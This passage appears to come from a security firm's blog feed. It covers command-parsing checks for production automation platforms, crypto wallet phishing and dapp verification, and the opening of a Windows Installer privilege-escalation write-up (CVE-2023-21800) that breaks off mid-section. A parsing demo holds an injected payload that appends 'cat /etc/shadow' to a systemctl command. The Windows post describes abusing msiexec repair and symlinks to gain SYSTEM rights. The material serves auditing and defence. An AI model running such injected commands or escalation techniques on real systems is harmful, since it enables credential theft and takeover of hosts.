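service_rules = {"max_reboot_percent": 50, "max_hosts_per_job": 5}
print(effective_limits(global_rules, service_rules))
```

When auditing, the interesting test case is the one shown here: a service rule that tries to raise a global limit should be silently capped or rejected, never honored.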

M. Command Parsing

If an allowlist is enforced, inspect how the command is parsed when an allowlist is created (abstract syntax tree (AST), regex, binary match, etc.).
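To illustrate why the parsing strategy matters, the sketch below compares a prefix regex with a check on the tokenized argument vector. The allowlist contents, the systemctl example, and the unit-name pattern are all assumptions made for the demo.

```python
import re
import shlex

# Hypothetical allowlist: binary -> permitted subcommands.
ALLOWED = {"systemctl": {"status", "restart"}}

# A naive check that only looks at how the command starts.
NAIVE_PATTERN = re.compile(r"^systemctl (status|restart) \S+")


def allowed_by_argv(command):
    """Tokenize the command and validate every argument, not just the prefix."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return False  # unbalanced quotes and similar parse errors are rejected
    if len(argv) != 3:
        return False
    binary, subcommand, unit = argv
    if subcommand not in ALLOWED.get(binary, set()):
        return False
    if unit.startswith("-"):
        return False  # no option injection through the unit name
    return re.fullmatch(r"[A-Za-z0-9@_.-]+", unit) is not None


payload = "systemctl status nginx; cat /etc/shadow"
print(bool(NAIVE_PATTERN.match(payload)), allowed_by_argv(payload))
```

The prefix regex accepts the payload with the trailing shell command, while the argv-based check rejects it. Whether that difference is exploitable depends on whether the platform later hands the string to a shell.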

N. Race Conditions

All operations should be queued, and a global queue for the commands should be respected. There should be no chance of race conditions if two concurrent operations are issued.

O. Break-glass

In the ZTP pattern, a break-glass mechanism is always available for emergency response. Auditing this mode is essential. Entering it must be loud, justified, alert security, and be heavily logged. As an additional security measure, the breakglass mechanism for zero trust networking should be available only from specific locations. These locations are the organization’s panic rooms, specific locations with additional physical access controls to offset the increased trust placed in their connectivity.

Conclusions

As more companies develop and adopt Zero Touch Production platforms, it is crucial to understand and test these services for security vulnerabilities. With an increase in vendors and solutions for Zero Touch Production in the coming years, researching and staying informed about these platforms’ security issues is an excellent opportunity for security professionals.

References

Michał Czapiński and Rainer Wolafka from Google Switzerland, “Zero Touch Prod: Towards Safer and More Secure Production Environments”. USENIX (2019). Link / Talk ↩
Ward, Rory, and Betsy Beyer. “Beyondcorp: A new approach to enterprise security”, (2014). Link ↩
Adkins, Heather, et al. “Building secure and reliable systems: best practices for designing, implementing, and maintaining systems”. O’Reilly Media, (2020). Link ↩

The Case For Improving Crypto Wallet Security

2023-03-28T00:00:00+02:00

Anatomy Of A Modern Day Crypto Scam

A large number of today’s crypto scams involve some sort of phishing attack, where the user is tricked into visiting a shady/malicious web site and connecting their wallet to it. The main goal is to trick the user into signing a transaction which will ultimately give the attacker control over the user’s tokens.

Usually, it all starts with a tweet or a post on some Telegram group or Slack channel, where a link is sent advertising either a new yield farming protocol boasting large APYs, or a new NFT project which just started minting. In order to interact with the web site, the user would need to connect their wallet and perform some confirmation or authorization steps.

Let’s take a look at the common NFT approve scam. The user is led to the malicious NFT site, advertising a limited pre-mint of their new NFT collection. The user is then prompted to connect their wallet and sign a transaction, confirming the mint. However, for some reason, the transaction fails. The same happens on the next attempt. With each failed attempt, the user becomes more and more frustrated, believing the issue causes them to miss out on the mint. Their concentration and focus shifts slightly from paying attention to the transactions, to missing out on a great opportunity.

At this point, the phishing is in full swing. A few more failed attempts, and the victim bites.

(Image borrowed from How scammers manipulate Smart Contracts to steal and how to avoid it)

The final transaction, instead of the mint function, calls the setApprovalForAll, which essentially will give the malicious actor control over the user’s tokens. The user by this point is in a state where they blindly confirm transactions, hoping that the minting will not close.

Unfortunately, the last transaction is the one that goes through. Game over for the victim. All the attacker has to do now is act quickly and transfer the tokens away from the user’s wallet before the victim realizes what happened.

These types of attacks are really common today. A user stumbles on a link to a project offering new opportunities for profits, they connect their wallet, and mistakenly hand over their tokens to malicious actors. While a case can be made for user education, responsibility, and researching a project before interacting with it, we believe that software also has a big part to play.

The Case For Improving Crypto Wallet Security

Nobody can deny that the introduction of both blockchain-based technologies and Web3 has had a massive impact on the world. A lot of them have offered the following common set of features:

transfer of funds
permission-less currency exchange
decentralized governance
digital collectibles

Regardless of the tech-stack used to build these platforms, it’s ultimately the users who make the platform. This means that users need a way to interact with their platform of choice. Today, the most user-friendly way of interacting with blockchain-based platforms is by using a crypto wallet. In simple terms, a crypto wallet is a piece of software which facilitates signing of blockchain transactions using the user’s private key. There are multiple types of wallets including software, hardware, custodial, and non-custodial. For the purposes of this post, we will focus on software based wallets.

Before continuing, let’s take a short detour to Web2. In that world, we can say that platforms (also called services, portals or servers) are primarily built using TCP/IP based technologies. In order for users to be able to interact with them, they use a user-agent, also known as a web browser. With that said, we can make the following parallel to Web3:

Technology	Communication Protocol	User-Agent
Web2	HTTP/TLS	Web Browser
Web3	Blockchain JSON RPC	Crypto Wallet

Web browsers are arguably much, much more complex pieces of software compared to crypto wallets - and with good reason. As the Internet developed, people figured out how to put different media on it and web pages allowed for dynamic and scriptable content. Over time, advancements in HTML and CSS technologies changed what and how content could be shown on a single page. The Internet became a place where people went to socialize, find entertainment, and make purchases. Browsers needed to evolve, to support new technological advancements, which in turn increased complexity. As with all software, complexity is the enemy, and complexity is where bugs and vulnerabilities are born. Browsers needed to implement controls to help mitigate web-based vulnerabilities such as spoofing, XSS, and DNS rebinding while still helping to facilitate secure communication via encrypted TLS connections.

Next, let’s see what a typical crypto wallet interaction for a normal user might look like.

The Current State Of Things In The Web3 World

Using a Web3 platform today usually means that a user is interacting with a web application (Dapp), which contains code to interact with the user’s wallet and smart contracts belonging to the platform. The steps in that communication flow generally look like:

1. Open the Dapp

In most cases, the user will navigate their web browser to a URL where the Dapp is hosted (ex. Uniswap). This will load the web page containing the Dapp’s code. Once loaded, the Dapp will try to connect to the user’s wallet.

2. Authorizing The Dapp

A few of the protections implemented by crypto wallets include requiring authorization before being able to access the user’s accounts and requests for transactions to be signed. This was not the case before EIP-1102. However, implementing these features helped keep users anonymous, stop Dapp spam, and provide a way for the user to manage trusted and un-trusted Dapp domains.

If all the previous steps were completed successfully, the user can start using the Dapp.

When the user decides to perform an action (make a transaction, buy an NFT, stake their tokens, etc.), the user’s wallet will display a popup, asking whether the user confirms the action. The transaction parameters are generated by the Dapp and forwarded to the wallet. If confirmed, the transaction will be signed and published to the blockchain, awaiting confirmation.

Besides the authorization popup when initially connecting to the Dapp, the user is not shown much additional information about the application or the platform. This ultimately burdens the user with verifying the legitimacy and trustworthiness of the Dapp and, unfortunately, this requires some degree of technical knowledge often out-of-reach for the majority of common users. While doing your own research, a common mantra of the Web3 world, is recommended, one misstep can lead to significant loss of funds.

That being said, let’s now take another detour to the Web2 world, and see what a similar interaction looks like.

How Does The Web2 World Handle Similar Situations?

Like the previous example, we’ll look at what happens when a user wants to use a Web2 application. Let’s say that the user wants to check their email inbox. They’ll start by navigating their browser to the email domain (ex. Gmail). In the background, the browser performs a TLS handshake, trying to establish a secure connection to Gmail’s servers. This will enable an encrypted channel between the user’s browser and Gmail’s servers, eliminating the possibility of any eavesdropping. If the handshake is successful, an encrypted connection is established and communicated to the user through the browser’s UI.

The secure connection is based on certificates issued for the domain the user is trying to access. A certificate contains a public key used to establish the encrypted connection. Additionally, certificates must be signed by a trusted third-party called a Certificate Authority (CA), giving the issued certificate legitimacy and guaranteeing that it belongs to the domain being accessed.

But, what happens if that is not the case? What happens when the certificate is for some reason rejected by the browser? Well, in that case a massive red warning is shown, explaining what happened to the user.

Such warnings will be shown when a secure connection could not be established, the certificate of the host is not trusted or if the certificate is expired. The browser also tries to show, in a human-readable manner, as much useful information about the error as possible. At this point, it’s the choice of the user whether they trust the site and want to continue interacting with it. The task of the browser is to inform the user of potential issues.

What Can Be Done?

Crypto wallets should show the user as much information about the action being performed as possible. The user should see information about the domain/Dapp they are interacting with. Details about the actual transaction’s content, such as what function is being invoked and its parameters should be displayed in a user-readable fashion.
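As a small illustration of what “user-readable” could mean for the approval scam described earlier, the sketch below decodes raw transaction calldata and turns a setApprovalForAll call into a plain-language warning. The selector constant is the commonly published 4-byte selector for setApprovalForAll(address,bool) and is hardcoded here as an assumption; the function name and wording of the messages are made up for the example.

```python
# Commonly published selector for setApprovalForAll(address,bool); treated as an assumption.
SET_APPROVAL_FOR_ALL = "a22cb465"


def describe_calldata(calldata_hex):
    """Turn raw calldata into a short, human-readable description."""
    if calldata_hex.startswith("0x"):
        calldata_hex = calldata_hex[2:]
    data = bytes.fromhex(calldata_hex)
    selector, args = data[:4].hex(), data[4:]
    if selector != SET_APPROVAL_FOR_ALL or len(args) != 64:
        return "Unknown call with selector 0x" + selector
    operator = "0x" + args[12:32].hex()  # address is the low 20 bytes of the first word
    approved = int.from_bytes(args[32:64], "big") != 0  # second word is the bool flag
    if approved:
        return f"WARNING: gives {operator} control over ALL of your tokens in this collection"
    return f"Revokes control of {operator} over your tokens in this collection"


calldata = "0x" + SET_APPROVAL_FOR_ALL + "00" * 12 + "11" * 20 + "00" * 31 + "01"
print(describe_calldata(calldata))
```

A user who expects to mint and instead reads a warning like this has a much better chance of rejecting the transaction, even on the fifth frustrated attempt.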

Comparing both previous examples, we can notice a lack of verification and information being displayed in crypto wallets today. This then poses the question: what can be done? There exist a number of publicly available indicators for the health and legitimacy of a project. We believe communicating these to the user may be a good step forward in addressing this issue. Let’s quickly go through them.

Proof Of Smart Contract Ownership

It is important to prove that a domain has ownership over the smart contracts with which it interacts. Currently, this mechanism doesn’t seem to exist. However, we think we have a good solution. Similarly to how Apple performs merchant domain verification, a simple JSON file or dapp_file can be used to verify ownership. The file can be stored on the root of the Dapp’s domain, on the path .well-known/dapp_file. The JSON file can contain the following information:

address of the smart contract the Dapp is interacting with
timestamp showing when the file was generated
signature of the content, verifying the validity of the file

At this point, a reader might say: “How does this show ownership of the contract?”. The key to that is the signature. Namely, the signature is generated by using the private key of the account which deployed the contract. The transparency of the blockchain can be used to get the deployer address, which can then be used to verify the signature (similarly to how Ethereum smart contracts verify signatures on-chain).

This mechanism enables creating an explicit association between a smart contract and the Dapp. The association can later be used to perform additional verification.
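The check a wallet would perform can be sketched as follows. Everything concrete here is an assumption: the JSON key names (address, timestamp, signature), the canonical form that gets signed, and the recover_signer callable, which stands in for a real secp256k1 signature recovery routine that is not implemented in this example.

```python
import json


def signed_payload(dapp_file):
    """Assumed canonical form: the address and timestamp as compact, sorted JSON."""
    body = {"address": dapp_file["address"], "timestamp": dapp_file["timestamp"]}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def verify_dapp_file(dapp_file, deployer_address, recover_signer):
    """Accept the file only if its signature was produced by the contract deployer."""
    signer = recover_signer(signed_payload(dapp_file), dapp_file["signature"])
    return signer.lower() == deployer_address.lower()


def fake_recover_signer(payload, signature):
    """Stand-in for real signature recovery, used only to exercise the flow."""
    return "0xDeployer" if signature == "valid-signature" else "0xSomeoneElse"


dapp_file = {"address": "0xContract", "timestamp": 1679961600, "signature": "valid-signature"}
print(verify_dapp_file(dapp_file, "0xdeployer", fake_recover_signer))
```

In a real wallet, deployer_address would be looked up from the chain for the contract listed in the file, so a phishing site cannot simply point at a legitimate contract it did not deploy.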

Domain Registration Records

When a new domain is purchased or registered, a public record is created in a public registrar, indicating the domain is owned by someone and is no longer available for purchase. The domain name is used by the Domain Name System, or DNS, which translates it (ex. www.doyensec.com) to a machine-friendly IP address (ex. 34.210.62.107).

The creation date of a DNS record shows when the Dapp’s domain was initially purchased. So, if a user is trying to interact with an already long established project and runs into a domain which claims to be that project with a recently created domain registration record, it may be a signal of possible fraudulent activities.

TLS Certificates

Creation and expiration dates of TLS certificates can be viewed in a similar fashion as DNS records. However, due to the short duration of certificates issued by services such as Let’s Encrypt, there is a strong chance that visitors of the Dapp will be shown a relatively new certificate.

TLS certificates, however, can be viewed as a way of verifying a correct web site setup where the owner took additional steps to allow secure communication between the user and their application.

Smart Contract Source Code Verification Status

Published and verified source code allows for audits of the smart contract’s functionality and can allow quick identification of malicious activity.

Smart Contract Deployment Date

The smart contract’s deployment date can provide additional information about the project. For example, if attackers set up a fake Uniswap web site, the likelihood of the malicious smart contract being recently deployed is high. If interacting with an already established, legitimate project, such a discrepancy should alert the user to potential malicious activity.

Smart Contract Interactions

The trustworthiness of a project can be seen as a function of the number of interactions with that project’s smart contracts. A healthy project with a large user base will likely have a large number of unique interactions with the project’s contracts. A small number of interactions, unique or not, suggests the opposite. While typical of a new project, it can also be an indicator of smart contracts set up to impersonate a legitimate project. Such smart contracts will not have the large user base of the original project, and thus the number of interactions with them will be low.

Overall, a large number of unique interactions over a long period of time with a smart contract may be a powerful indicator of a project’s health and the health of its ecosystem.

Our Suggestion

While there are authorization steps implemented when a wallet is connecting to an unknown domain, we think there is space for improvement. The connection and transaction signing process can be further updated to show user-readable information about the domain/Dapp being accessed.

As a proof of concept, we implemented a simple web service: https://github.com/doyensec/wallet-info. The service utilizes public information, such as domain registration records, TLS certificate information, and data available via Etherscan’s API. The data is retrieved, validated, parsed, and returned to the caller.

The service provides access to the following endpoints:

/host?url=<url>
/contract?address=<address>

The data these endpoints return can be integrated in crypto wallets at two points in the user’s interaction.
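As a rough illustration of how a wallet might address the two endpoints, the sketch below builds the request URLs. The base URL is a placeholder assumption (the post does not name a hosted instance), and the helper names are ours.

```javascript
// Assumption: a wallet-info instance is reachable at this base URL.
// The host and port are placeholders, not a real deployment.
const BASE_URL = 'http://localhost:8080';

function hostInfoUrl(dappUrl) {
  const endpoint = new URL('/host', BASE_URL);
  endpoint.searchParams.set('url', dappUrl); // percent-encodes the value
  return endpoint.toString();
}

function contractInfoUrl(address) {
  // Basic sanity check: "0x" followed by 20 bytes of hex.
  if (!/^0x[0-9a-fA-F]{40}$/.test(address)) {
    throw new Error(`Not a 20-byte hex address: ${address}`);
  }
  const endpoint = new URL('/contract', BASE_URL);
  endpoint.searchParams.set('address', address);
  return endpoint.toString();
}

console.log(hostInfoUrl('https://app.example.com/'));
console.log(contractInfoUrl('0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404'));
```

Letting `URL` and `searchParams` do the encoding avoids hand-built query strings, which matters here because the `url` parameter is itself a full URL.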

Initial Dapp Access

The /host endpoint can be used when the user is initially connecting to a Dapp. The Dapp’s URL should be passed as a parameter to the endpoint. The service will use the supplied URL to gather information about the web site and its configuration. Additionally, the service will check for the presence of the dapp_file on the site’s root and verify its signature. Once processing is finished, the service will respond with:

{
  "name": "Example Dapp",
  "timestamp": "2000-01-01T00:00:00Z",
  "domain": "app.example.com",
  "tls": true,
  "tls_issued_on": "2022-01-01T00:00:00Z",
  "tls_expires_on": "2022-01-01T00:00:00Z",
  "dns_record_created": "2012-01-01T00:00:00Z",
  "dns_record_updated": "2022-08-14T00:01:31Z",
  "dns_record_expires": "2023-08-13T00:00:00Z",
  "dapp_file": true,
  "valid_signature": true
}

This information can be shown to the user in a dialog UI element, such as:

As a concrete example, let’s take a look at this fake Uniswap site, which was active during the writing of this post. If a user tried to connect their wallet to the Dapp running on the site, the following information would be returned to the user:

{
  
  "name": null,
  "timestamp": null,
  "domain": "apply-uniswap.com",
  "tls": true,
  "tls_issued_on": "2023-02-06T22:37:19Z",
  "tls_expires_on": "2023-05-07T22:37:18Z",
  "dns_record_created": "2023-02-06T23:31:09Z",
  "dns_record_updated": "2023-02-06T23:31:10Z",
  "dns_record_expires": "2024-02-06T23:31:09Z",
  "dapp_file": false,
  "valid_signature": false
}

The missing information in the response reflects that the dapp_file was not found on this domain. This information will then be reflected in the UI, informing the user of potential issues with the Dapp:

At this point, the users can review the information and decide whether they feel comfortable giving the Dapp access to their wallet. Once the Dapp is authorized, this information doesn’t need to be shown anymore. Though, it would be beneficial to occasionally re-display this information, so that any changes in the Dapp or its domain will be communicated to the user.
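To make the mapping from response to UI concrete, here is a minimal sketch of how a wallet might derive warnings from a /host response. The field names follow the example responses above; the function name, the message wording, and the 90-day threshold are assumptions for illustration only.

```javascript
// Hypothetical mapping from a /host response to user-facing warnings.
function hostWarnings(info, now = new Date()) {
  const warnings = [];
  if (!info.tls) {
    warnings.push('The site does not use TLS.');
  }
  if (!info.dapp_file) {
    warnings.push('No dapp_file was found on the domain.');
  } else if (!info.valid_signature) {
    warnings.push('The dapp_file signature could not be verified.');
  }
  // Date.parse('') yields NaN, so a missing date is treated as "unknown age".
  const createdMs = Date.parse(info.dns_record_created ?? '');
  const ageDays = (now.getTime() - createdMs) / (24 * 60 * 60 * 1000);
  if (Number.isNaN(ageDays) || ageDays < 90) {
    warnings.push('The domain was registered recently or its age is unknown.');
  }
  return warnings;
}

// Relevant fields from the fake Uniswap response shown above.
const fakeUniswap = {
  domain: 'apply-uniswap.com',
  tls: true,
  dns_record_created: '2023-02-06T23:31:09Z',
  dapp_file: false,
  valid_signature: false,
};
console.log(hostWarnings(fakeUniswap, new Date('2023-03-01T00:00:00Z')));
```

For the fake site, this yields two warnings (missing dapp_file and a recently registered domain), while the "Example Dapp" response above would yield none.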

Making A Transaction

Transactions can be split in two groups: transactions that transfer native tokens and transactions which are smart contract function calls. Based on the type of transaction being performed, the /contract endpoint can be used to retrieve information about the recipient of the transferred assets.

For our case, the smart contract function calls are the more interesting group of transactions. The wallet can retrieve information about both the smart contract on which the function will be called and the function parameter representing the recipient, for example, the spender parameter in the approve(address spender, uint256 amount) function call. This information can be retrieved on a case-by-case basis, depending on the function call being performed.

Signatures of widely used functions are available and can be implemented in the wallet as a type of an allow or safe list. If a signature is unknown, the user should be informed about it.
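A minimal sketch of such an allow list is shown below. It maps the 4-byte selectors of a few common ERC-20/ERC-721 functions to the position of the recipient argument and extracts that address from the raw calldata. The helper name and the returned object shape are our own assumptions; a real wallet would more likely rely on a full ABI decoder.

```javascript
// 4-byte selectors of a few widely used token functions. recipientIndex is
// the position of the address argument that receives tokens or an allowance.
const KNOWN_FUNCTIONS = new Map([
  ['0xa9059cbb', { signature: 'transfer(address,uint256)', recipientIndex: 0 }],
  ['0x095ea7b3', { signature: 'approve(address,uint256)', recipientIndex: 0 }],
  ['0x23b872dd', { signature: 'transferFrom(address,address,uint256)', recipientIndex: 1 }],
  ['0xa22cb465', { signature: 'setApprovalForAll(address,bool)', recipientIndex: 0 }],
]);

function describeCall(calldata) {
  const hex = calldata.toLowerCase().replace(/^0x/, '');
  if (hex.length < 8) {
    return { known: false, selector: null };
  }
  const selector = '0x' + hex.slice(0, 8);
  const entry = KNOWN_FUNCTIONS.get(selector);
  if (!entry) {
    return { known: false, selector }; // the user should be told it is unknown
  }
  // Each static argument occupies one 32-byte word (64 hex characters);
  // an address sits in the low 20 bytes of its word.
  const wordStart = 8 + entry.recipientIndex * 64;
  const word = hex.slice(wordStart, wordStart + 64);
  const recipient = word.length === 64 ? '0x' + word.slice(24) : null;
  return { known: true, selector, signature: entry.signature, recipient };
}

// Example: approve(spender, max uint256), built from its parts.
const spender = '0x002362c343061fef2b99d1a8f7c6aeafe54061af';
const calldata = '0x095ea7b3' + spender.slice(2).padStart(64, '0') + 'f'.repeat(64);
console.log(describeCall(calldata));
```

The extracted recipient is the address that would then be passed to the /contract endpoint.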

Verifying the recipient gives users confidence that they are transferring tokens, or granting access to their tokens, to known, legitimate addresses.

An example response for a given address will look something like:

{
  "is_contract": true,
  "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
  "contract_deployer": "0x002362c343061fef2b99d1a8f7c6aeafe54061af",
  "contract_deployed_on": "2023-01-01T00:00:00Z",
  "contract_tx_count": 10,
  "contract_unique_tx": 5,
  "valid_signature": true,
  "verified_source": false
}

In the background, the web service will gather information about the type of address (EOA or smart contract), code verification status, address interaction information etc. All of that should be shown to the user as part of the transaction confirmation step.
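The confirmation step could summarize a /contract response along these lines. This is only a sketch: the field names come from the example response above, while the function name, the messages, and both thresholds (30 days, 100 unique interactions) are arbitrary assumptions that a real wallet would need to tune.

```javascript
// Hypothetical summary of a /contract response for the confirmation dialog.
function contractWarnings(info, now = new Date(), limits = { minAgeDays: 30, minUniqueTx: 100 }) {
  if (!info.is_contract) {
    return ['The address is an externally owned account (EOA), not a contract.'];
  }
  const warnings = [];
  if (!info.verified_source) {
    warnings.push('The contract source code is not verified.');
  }
  if (!info.valid_signature) {
    warnings.push('The contract is not linked to the Dapp by a valid signature.');
  }
  // A missing or malformed date parses to NaN and is reported as a warning.
  const deployedMs = Date.parse(info.contract_deployed_on ?? '');
  const ageDays = (now.getTime() - deployedMs) / (24 * 60 * 60 * 1000);
  if (Number.isNaN(ageDays) || ageDays < limits.minAgeDays) {
    warnings.push('The contract was deployed recently or its age is unknown.');
  }
  if ((info.contract_unique_tx ?? 0) < limits.minUniqueTx) {
    warnings.push('The contract has few unique interactions.');
  }
  return warnings;
}

// Relevant fields from the example response above.
const example = {
  is_contract: true,
  contract_deployed_on: '2023-01-01T00:00:00Z',
  contract_tx_count: 10,
  contract_unique_tx: 5,
  valid_signature: true,
  verified_source: false,
};
console.log(contractWarnings(example, new Date('2023-03-01T00:00:00Z')));
```

With the example response, the unverified source and the low number of unique interactions are flagged, while the deployment date passes the (assumed) 30-day limit.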

Links to the smart contract and any additional information can be provided here, helping users perform additional verification if they so wish.

In the case of native token transfers, the majority of verification consists of typing in the valid to address. This is not a task that is well suited for automatic verification. For this use case, wallets provide an “address book” like functionality, which should be utilized to minimize any user errors when initializing a transaction.

Conclusion

The point of this post is to highlight the shortcomings of today’s crypto wallet implementations, to present ideas, and make suggestions for how they can be improved. This field is actively being worked on. Recently, MetaMask updated their confirmation UI to display additional information, informing users of potential setApprovalForAll scams. This is a step in the right direction, but there is still a long way to go. Features like these can be built upon and augmented, to a point where users can make transactions and know, to a high level of certainty, that they are not making a mistake or being scammed.

There are also third-party groups like WalletGuard and ZenGo who have implemented verifications similar to those described in this post. These features should be standard and required for every crypto wallet, not just an additional piece of software that needs to be installed.

Like the user-agent of Web2, the web browser, user-agents of Web3 should do as much as possible to inform and protect their users.

Our implementation of the wallet-info web service is just an example of how public information can be pooled together. That information, combined with a good UI/UX design, will greatly improve the security of crypto wallets and, in turn, the security of the entire Web3 ecosystem.

Does Dapp verification completely solve the phishing/scam problem? Unfortunately, the answer is no. The proposed changes can help users in distinguishing between legitimate projects and potential scams, and guide them to make the right decision. Dedicated attackers, given enough time and funds, will always be able to produce a smart contract, Dapp or web site, which will look harmless using the indicators described above. This is true for both the Web2 and Web3 world.

Ultimately, it is up to the user to decide if they feel comfortable giving their login credentials to a web site, or access to their crypto wallet to a Dapp. All software can do is point them in the right direction.

Windows Installer EOP (CVE-2023-21800)

2023-03-21T00:00:00+01:00

TL;DR: This blog post describes the details and methodology of our research targeting the Windows Installer (MSI) installation technology. If you’re only interested in the vulnerability itself, jump straight to the “One vulnerability to rule them all (CVE-2023-21800)” section.

Introduction

Recently, I decided to research a single common aspect of many popular Windows applications - their MSI installer packages.

Not every application is distributed this way. Some applications implement custom bootstrapping mechanisms, some are just meant to be dropped on the disk. However, in a typical enterprise environment, some form of control over the installed packages is often desired. Using the MSI packages simplifies the installation process for any number of systems and also provides additional benefits such as automatic repair, easy patching, and compatibility with GPO. A good example is Google Chrome, which is typically distributed as a standalone executable, but an enterprise package is offered on a dedicated domain.

Another interesting aspect of enterprise environments is a need for strict control over employee accounts. In particular, in a well-secured Windows environment, the rule of least privileges ensures no administrative rights are given unless there’s a really good reason. This is bad news for malware or malicious attackers who would benefit from having additional privileges at hand.

During my research, I wanted to take a look at the security of popular MSI packages and understand whether they could be used by an attacker for any malicious purposes and, in particular, to elevate local privileges.

Typical installation

It’s very common for the MSI package to require administrative rights. As a result, running a malicious installer is a straightforward game-over. I wanted to look at legitimate, properly signed MSI packages. Asking someone to type an admin password, then somehow opening elevated cmd is also an option that I chose not to address in this blog post.

Let’s quickly look at how the installer files are generated. Turns out, there are several options to generate an MSI package. Some of the most popular ones are WiX Toolset, InstallShield, and Advanced Installer. The first one is free and open-source, but requires you to write dedicated XML files. The other two offer various sets of features, rich GUI interfaces, and customer support, but require an additional license. One could look for generic vulnerabilities in those products, however, it’s really hard to address all possible variations of offered features. On the other hand, it’s exactly where the actual bugs in the installation process might be introduced.

During the installation process, new files will be created. Some existing files might also be renamed or deleted. The access rights to various securable objects may be changed. The interesting question is what would happen if unexpected access rights are present. Would the installer fail or would it attempt to edit the permission lists? Most installers will also modify Windows registry keys, drop some shortcuts here and there, and finally log certain actions in the event log, database, or plain files.

The list of actions isn’t really sealed. The MSI packages may implement the so-called custom actions which are implemented in a dedicated DLL. If this is the case, it’s very reasonable to look for interesting bugs over there.

Once we have an installer package ready and installed, we can often observe a new copy being cached in the C:\Windows\Installer directory. This is a hidden system directory where unprivileged users cannot write. The copies of the MSI packages are renamed to random names matching the following regular expression: ^[0-9a-z]{7}\.msi$. The name will be unique for every machine and even every new installation. To identify a specific package, we can look at file properties (but it’s up to the MSI creator to decide which properties are configured), search the Windows registry, or query WMI:

$ Get-WmiObject -class Win32_Product | ? { $_.Name -like "*Chrome*" } | select IdentifyingNumber,Name

IdentifyingNumber                      Name
-----------------                      ----
{B460110D-ACBF-34F1-883C-CC985072AF9E} Google Chrome

Referring to the package via its GUID is our safest bet. However, different versions of the same product may still have different identifiers.
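When scripting around these identifiers, it can help to validate them before use. The sketch below applies the cached-file naming pattern quoted above and a generic GUID pattern for product codes; the helper names and the sample cached file name are made up for illustration.

```javascript
// Pattern for cached package names, as quoted in the text above.
const CACHED_MSI_NAME = /^[0-9a-z]{7}\.msi$/;
// Generic pattern for a brace-wrapped GUID such as an MSI product code.
const PRODUCT_CODE = /^\{[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}\}$/;

function isCachedMsiName(fileName) {
  return CACHED_MSI_NAME.test(fileName);
}

function isProductCode(value) {
  return PRODUCT_CODE.test(value);
}

console.log(isCachedMsiName('1a2b3c4.msi'));     // true (made-up name)
console.log(isCachedMsiName('7z2201-x64.msi'));  // false (original file name)
console.log(isProductCode('{B460110D-ACBF-34F1-883C-CC985072AF9E}')); // true
```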

Assuming we’re using an unprivileged user account, is there anything interesting we can do with that knowledge?

Repair process

The built-in Windows tool, called msiexec.exe, is located in the System32 and SysWOW64 directories. It is used to manage the MSI packages. The tool is a core component of Windows with a long history of vulnerabilities. As a side note, I also happen to have found one such issue in the past (CVE-2021-26415). The documented list of its options can be found on the MSDN page, although some additional undocumented switches are also implemented.

The flags worth highlighting are:

/l*vx to log any additional details and search for interesting events
/qn to hide any UI interactions. This is extremely useful when attempting to develop an automated exploit. On the other hand, potential errors will result in new message boxes. Until the message is accepted, the process does not continue and can be frozen in an unexpected state. We might be able to modify some existing files before the original access rights are reintroduced.

The repair options section lists flags we could use to trigger the repair actions. These actions would ensure the bad files are removed, and good files are reinstalled instead. The definition of bad is something we control, i.e., we can force the reinstallation of all files, all registry entries, or, say, only those with an invalid checksum.

Parameter	Description
`/fp`	Repairs the package if a file is missing.
`/fo`	Repairs the package if a file is missing, or if an older version is installed.
`/fe`	Repairs the package if a file is missing, or if an equal or older version is installed.
`/fd`	Repairs the package if a file is missing, or if a different version is installed.
`/fc`	Repairs the package if a file is missing, or if the checksum does not match the calculated value.
`/fa`	Forces all files to be reinstalled.
`/fu`	Repairs all the required user-specific registry entries.
`/fm`	Repairs all the required computer-specific registry entries.
`/fs`	Repairs all existing shortcuts.
`/fv`	Runs from source and re-caches the local package.

Most of the msiexec actions will require elevation. We cannot install or uninstall arbitrary packages (unless, of course, the system is badly misconfigured). However, the repair option might be an interesting exception! It might be, because not every package will work like this, but it’s not hard to find one that will. For these, msiexec will auto-elevate to perform the necessary actions as the SYSTEM user. Interestingly enough, some actions will still be performed using our unprivileged account, making the case even more noteworthy.

The impersonation of our account will happen for various security reasons. Only some actions can be impersonated, though. If you’re seeing a file renamed by the SYSTEM user, it’s always going to be a fully privileged action. On the other hand, when analyzing who exactly writes to a given file, we need to look at how the file handle was opened in the first place.

We can use tools such as Process Monitor to observe all these events. To filter out the noise, I would recommend using the settings shown below. It’s possible to miss something interesting, e.g., a child process’s actions, but it’s unrealistic to dig into every single event at once. Also, I’m intentionally disabling registry activity tracking, but occasionally it’s worth re-enabling this to see if certain actions are controlled by editable registry keys.

Another trick I’d recommend is to highlight the distinction between impersonated and non-impersonated operations. I prefer to highlight anything that isn’t explicitly impersonated, but you may prefer to reverse the logic.

Then, to start analyzing the events of the aforementioned Google Chrome installer, one could run the following command:

msiexec.exe /fa '{B460110D-ACBF-34F1-883C-CC985072AF9E}'

The stream of events should be captured by ProcMon but to look for issues, we need to understand what can be considered an issue. In short, any action on a securable object that we can somehow modify is interesting. SYSTEM writes a file we control? That’s our target.

Typically, we cannot directly control the affected path. However, we can replace the original file with a symlink. Regular symlinks are likely not available for unprivileged users, but we may use some tricks and tools to reinvent the functionality on Windows.

Windows EoP primitives

Although we’re not trying to pop a shell out of every located vulnerability, it’s interesting to educate the readers on what would be possible given some of the Elevation of Privilege primitives.

With an arbitrary file creation vulnerability we could attack the system by creating a DLL that one of the system processes would load. It’s slightly harder, but not impossible, to locate a Windows process that loads our planted DLL without rebooting the entire system.

Having an arbitrary file creation vulnerability but with no control over the content, our chances to pop a shell are drastically reduced. We can still make Windows inoperable, though.

With an arbitrary file delete vulnerability we can at least break the operating system. Often though, we can also turn this into an arbitrary folder delete and use the sophisticated method discovered by Abdelhamid Naceri to actually pop a shell.

The list of possible primitives is long and fascinating. A single EoP primitive should be treated as a serious security issue, nevertheless.

One vulnerability to rule them all (CVE-2023-21800)

I’ve observed the same interesting behavior in numerous tested MSI packages. The packages were created by different MSI creators using different types of resources and basically had nothing in common. Yet, they were all following the same pattern. Namely, the environment variables set by the unprivileged user were also used in the context of the SYSTEM user invoked by the repair operation.

Although I initially thought that the applications were incorrectly trusting some environment variables, it turned out that the Windows Installer’s rollback mechanism was responsible for the insecure actions.

7-zip

